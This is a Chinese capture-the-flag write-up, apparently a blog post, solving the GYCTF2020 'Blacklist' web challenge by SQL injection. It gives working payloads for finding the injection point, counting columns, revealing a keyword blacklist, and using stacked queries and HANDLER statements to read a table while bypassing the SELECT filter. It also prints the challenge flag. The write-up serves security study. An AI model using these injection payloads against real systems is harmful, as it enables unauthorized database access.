web19([GYCTF2020]Blacklist):

1.输入1'回显出语法错误(找到注入点,是字符型)

error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

2.依次输入1' order by 3#1' order by 1#1' order by 2#(只有第一次回显报错,说明列数为2)

3.输入-1' union select 1,2,3#测试回显位
回显:

return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);

以上是提示过滤了select
4.使用堆叠注入尝试查看库名和表名
1';show databases;

1';show tables;

查看列名:
1';show columns from FlagHere;#

使用hanlder语句获得flag:(好用欸)

1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#


tips:

handler 表名 open #打开表
handler 表名 read first #阅读表中的第一行数据
handler 表名 close #关闭表
handler 表名 read next #获取表中的下一行数据

FLAG:flag{a34e3221-985c-43f3-8155-7777fb2e1131}

posted @   舌口  阅读(7)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 在鹅厂做java开发是什么体验
· 百万级群聊的设计实践
· WPF到Web的无缝过渡:英雄联盟客户端的OpenSilver迁移实战
· 永远不要相信用户的输入:从 SQL 注入攻防看输入验证的重要性
· 浏览器原生「磁吸」效果!Anchor Positioning 锚点定位神器解析
点击右上角即可分享
微信分享提示